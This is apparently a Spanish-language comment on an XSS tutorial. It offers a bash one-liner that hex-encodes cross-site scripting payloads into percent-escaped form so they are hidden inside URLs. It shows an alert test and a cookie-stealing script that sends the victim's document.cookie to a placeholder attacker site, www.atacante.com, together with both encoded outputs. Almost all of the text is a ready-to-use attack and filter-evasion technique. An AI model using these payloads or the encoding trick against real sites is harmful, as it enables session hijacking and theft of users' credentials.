Muy bueno el esfuerzo para la explicación!
Me dieron ganas de colaborar!
Para ofuscar la URL
Crean el archivo ./toHexUrl.sh o como les plasca el nombre y le ponen dentro:
#!/bin/bash
echo $1 | hexdump -ve '/1 " %02X"'|sed s/' '/%/g;
Lo usan así:
./toHexUrl.sh "<script>alert('pepe');</script>"
Produce:
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%70%65%70%65%27%29%3B%3C%2F%73%63%72%69%70%74%3E%0A
Sino, pueden hacer así:
printf "<script>window.location='
http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>"|hexdump -ve '/1 " %02X"'|sed s/' '/%/g;
%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%61%74%61%63%61%6E%74%65%2E%63%6F%6D%2F%63%6F%6F%6B%69%65%73%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E